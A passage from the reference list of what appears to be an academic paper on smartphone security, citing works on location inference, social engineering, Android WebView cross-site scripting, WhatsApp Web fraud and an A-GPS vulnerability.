Tague, P., & Zhang, J. (2013, June). UnLocIn: Unauthorized

location inference on smartphones without being caught. Privacy and Security in Mobile Systems (PRISMS), 2013 International

Conference on (pp. 1-8). IEEE.

[23] Krombholz, K., Hobel, H., Huber, M., & Weippl, E. (2013). Social Engineering Attacks on the Knowledge Worker. In

Proceedings of the 6th International Conference on Security of

Information and Networks, 2013 on (pp. 28-35). ACM. [24] Bhavani, A B. (2013, April). Cross-site Scripting Attacks on

Android WebView. International Journal of Computer Science and

Network (IJCSN), Vol. 2, Issue 2, April 2013, ISSN: 2277-542 [25] Assolini, F. (2015, February 2). WhatsApp for Web in the

sight of cybercriminals. Retrieved March 06, 2016, from

https://securelist.com/blog/research/68631/whatsapp-for-web-in-the-sight-of-cybercriminals/

[26] Andrici, M. (2012, July 31). A-GPS vulnerability could let

hackers track your location, take over your phone. Retrieved March 06, 2016, from

http://www.androidauthority.com/a-gps-vulnerability-could-let-

hackers-track-your-location-take-over-your-phone-104532/